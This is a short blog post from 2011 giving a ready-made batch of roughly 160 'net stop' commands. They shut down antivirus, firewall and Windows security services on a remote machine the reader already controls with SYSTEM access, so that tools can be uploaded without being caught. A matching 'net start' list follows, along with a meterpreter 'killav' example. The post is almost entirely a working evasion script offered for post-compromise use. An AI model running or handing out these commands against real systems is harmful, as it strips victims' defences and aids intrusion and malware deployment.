«
»

Quickly disable security apps

Published December 20, 2011 | By phillips321

So you’ve got shell access to a remote box as SYSTEM and you want to upload some tools but you keep getting halted by antivirus and the like.

Here’s a quick list of services to kill:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
net stop "Ahnlab Task Scheduler"
net stop "altiris client service"
net stop ANTIVIR
net stop ATRACK
net stop "avast! antivirus"
net stop "avast! iavs4 control service"
net stop AVCONSOL
net stop "AVG6 Service"
net stop "AVG7 Alert Manager Server"
net stop "AVG7 Update Service"
net stop AVP32
net stop "AVP control center service"
net stop AVP.EXE  
net stop "AVSync Manager"
net stop AVSYNMGR
net stop "Background Intelligent Transfer Service"
net stop "BlackICE"
net stop "carbon copy access edition"
net stop CFINET
net stop CFINET32
net stop "config loader"
net stop "DefWatch"
net stop "Detector de OfficeScanNT"
net stop "directupdate engine"
net stop "dllhost"
net stop "dns"
net stop "etrust antivirus job server"
net stop "eTrust Antivirus Job Server"
net stop "etrust antivirus realtime server"
net stop "eTrust Antivirus Realtime Server"
net stop "etrust antivirus rpc server"
net stop "eTrust Antivirus RPC Server"
net stop "Eventask"
net stop "FireBall"
net stop "FireBaum"
net stop "fix-it task manager"
net stop F-PROT95
net stop FP-WIN
net stop F-STOPW
net stop "fxsvc"
net stop "gear security"
net stop IAMAPP
net stop ICMON
net stop "intel file transfer"
net stop "intel pds"
net stop "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"
net stop "InternetFirewallProc"
net stop "internet pr0tocol"
net stop IOMON98
net stop "iroff"
net stop "KAV Moniter Service"
net stop "kerio personal firewall"
net stop "Kingsoft AntiVirus Service"
net stop LOCKDOWN2000
net stop LUALL
net stop LUCOMSERVER
net stop "MastDLL"
net stop MCAFEE
net stop "McAfee Agent"
net stop "McAfee.com McShield"
net stop "McAfee.com VirusScan Online Realtime Engine"
net stop "mcafee framework service"
net stop "mcshield"
net stop "McShield"
net stop "MonSvcNT"
net stop msclol2
net stop "msclol2"
net stop msclol8
net stop "msclol8"
net stop msinit
net stop "MsInt"
net stop "MsIntScan"
net stop "NAV Alert"
net stop NAVAPSVC
net stop NAVAPW32
net stop "NAV Auto-Protect"
net stop NAVLU32
net stop NAVRUNR
net stop NAVW32
net stop NAVWNT
net stop NISSERV
net stop NISUM
net stop NMAIN
net stop noipducservice
net stop NORTON
net stop "Norton AntiVirus Auto Protect Service"
net stop "Norton AntiVirus Client"
net stop "Norton AntiVirus Corporate Edition"
net stop "Norton AntiVirus Server"
net stop "Norton Internet Security Accounts Manager"
net stop "Norton Internet Security Proxy Srvice"
net stop "Norton Internet Security service"
net stop "Norton Unerase Protection"
net stop NVC95
net stop "nvscv"
net stop "officescannt listener"
net stop "OfficeScanNT Monitor"
net stop "officescannt realtime scan"
net stop "outpost firewall service"
net stop "P2P Networking"
net stop "Panda Antivirus"
net stop "pcanywhere host service"
net stop "PC-cillin Personal Firewall"
net stop PCCIOMON
net stop PCCMAIN
net stop PCCWIN98
net stop POP3TRAP
net stop psexesvc
net stop PVIEW95
net stop "Quick Heal Online Protection"
net stop "RemoteAgent"
net stop "remotely possible/32"
net stop RESCUE32
net stop "rising process communication center"
net stop "Rising Process Communication Center"
net stop "rising realtime monitor service"
net stop "Rising Realtime Monitor Service"
net stop "rundll"
net stop SAFEWEB
net stop "ScriptBlocking Service"
net stop "scvhost"
net stop "secur2
net stop "Security Center"
net stop "services32 service: msinit"
net stop "servu"
net stop "Serv-U"
net stop "serv-u-ftp"
net stop "smss"
net stop "snake sockproxy service"
net stop "Sophos Anti-Virus"
net stop "Sophos Anti-Virus Network"
net stop "Sygate Personal Firewall"
net stop "Sygate Personal Firewall Pro"
net stop "SyGateService"
net stop "symantec central quarantine"
net stop "Symantec Event Manager"
net stop "Symantec Proxy Service"
net stop "symantec quarantine agent"
net stop "symantec quarantine scanner"
net stop SYMPROXYSVC
net stop "syslock"
net stop "System Event Notification"
net stop "systemsecuritydll"
net stop "task manager"
net stop "Trend Micro Proxy Service"
net stop "Trend NT Realtime Service"
net stop "V3MonNT"
net stop "V3MonSvc"
net stop "ViRobot Expert Monitoring"
net stop "ViRobot Lite Monitoring"
net stop "ViRobot Professional Monitoring"
net stop "vnc server"
net stop "VNC server"
net stop VSHWIN32
net stop VSSTAT
net stop WEBSCANX
net stop WEBTRAP
net stop win32sl
net stop "Windows Firewall"
net stop "Windows Internet Connection Sharing(ICS)"
net stop "ZoneAlarm"

Use with caution as it’s not as easy to start them all up again, maybe this would help?:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
net start "Ahnlab Task Scheduler"
net start "altiris client service"
net start ANTIVIR
net start ATRACK
net start "avast! antivirus"
net start "avast! iavs4 control service"
net start AVCONSOL
net start "AVG6 Service"
net start "AVG7 Alert Manager Server"
net start "AVG7 Update Service"
net start AVP32
net start "AVP control center service"
net start AVP.EXE  
net start "AVSync Manager"
net start AVSYNMGR
net start "Background Intelligent Transfer Service"
net start "BlackICE"
net start "carbon copy access edition"
net start CFINET
net start CFINET32
net start "config loader"
net start "DefWatch"
net start "Detector de OfficeScanNT"
net start "directupdate engine"
net start "dllhost"
net start "dns"
net start "etrust antivirus job server"
net start "eTrust Antivirus Job Server"
net start "etrust antivirus realtime server"
net start "eTrust Antivirus Realtime Server"
net start "etrust antivirus rpc server"
net start "eTrust Antivirus RPC Server"
net start "Eventask"
net start "FireBall"
net start "FireBaum"
net start "fix-it task manager"
net start F-PROT95
net start FP-WIN
net start F-STOPW
net start "fxsvc"
net start "gear security"
net start IAMAPP
net start ICMON
net start "intel file transfer"
net start "intel pds"
net start "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"
net start "InternetFirewallProc"
net start "internet pr0tocol"
net start IOMON98
net start "iroff"
net start "KAV Moniter Service"
net start "kerio personal firewall"
net start "Kingsoft AntiVirus Service"
net start LOCKDOWN2000
net start LUALL
net start LUCOMSERVER
net start "MastDLL"
net start MCAFEE
net start "McAfee Agent"
net start "McAfee.com McShield"
net start "McAfee.com VirusScan Online Realtime Engine"
net start "mcafee framework service"
net start "mcshield"
net start "McShield"
net start "MonSvcNT"
net start msclol2
net start "msclol2"
net start msclol8
net start "msclol8"
net start msinit
net start "MsInt"
net start "MsIntScan"
net start "NAV Alert"
net start NAVAPSVC
net start NAVAPW32
net start "NAV Auto-Protect"
net start NAVLU32
net start NAVRUNR
net start NAVW32
net start NAVWNT
net start NISSERV
net start NISUM
net start NMAIN
net start noipducservice
net start NORTON
net start "Norton AntiVirus Auto Protect Service"
net start "Norton AntiVirus Client"
net start "Norton AntiVirus Corporate Edition"
net start "Norton AntiVirus Server"
net start "Norton Internet Security Accounts Manager"
net start "Norton Internet Security Proxy Srvice"
net start "Norton Internet Security service"
net start "Norton Unerase Protection"
net start NVC95
net start "nvscv"
net start "officescannt listener"
net start "OfficeScanNT Monitor"
net start "officescannt realtime scan"
net start "outpost firewall service"
net start "P2P Networking"
net start "Panda Antivirus"
net start "pcanywhere host service"
net start "PC-cillin Personal Firewall"
net start PCCIOMON
net start PCCMAIN
net start PCCWIN98
net start POP3TRAP
net start psexesvc
net start PVIEW95
net start "Quick Heal Online Protection"
net start "RemoteAgent"
net start "remotely possible/32"
net start RESCUE32
net start "rising process communication center"
net start "Rising Process Communication Center"
net start "rising realtime monitor service"
net start "Rising Realtime Monitor Service"
net start "rundll"
net start SAFEWEB
net start "ScriptBlocking Service"
net start "scvhost"
net start "secur2
net start "Security Center"
net start "services32 service: msinit"
net start "servu"
net start "Serv-U"
net start "serv-u-ftp"
net start "smss"
net start "snake sockproxy service"
net start "Sophos Anti-Virus"
net start "Sophos Anti-Virus Network"
net start "Sygate Personal Firewall"
net start "Sygate Personal Firewall Pro"
net start "SyGateService"
net start "symantec central quarantine"
net start "Symantec Event Manager"
net start "Symantec Proxy Service"
net start "symantec quarantine agent"
net start "symantec quarantine scanner"
net start SYMPROXYSVC
net start "syslock"
net start "System Event Notification"
net start "systemsecuritydll"
net start "task manager"
net start "Trend Micro Proxy Service"
net start "Trend NT Realtime Service"
net start "V3MonNT"
net start "V3MonSvc"
net start "ViRobot Expert Monitoring"
net start "ViRobot Lite Monitoring"
net start "ViRobot Professional Monitoring"
net start "vnc server"
net start "VNC server"
net start VSHWIN32
net start VSSTAT
net start WEBSCANX
net start WEBTRAP
net start win32sl
net start "Windows Firewall"
net start "Windows Internet Connection Sharing(ICS)"
net start "ZoneAlarm"

Or the easy way should you have a materpreter session on the remote box:

1
2
3
meterpreter > run killav
[*] Killing Antivirus services on the target...
meterpreter >
Posted in Uncategorized | Tagged , , , , ,

Leave a Reply

Please feel free to share my content but always link back here :-)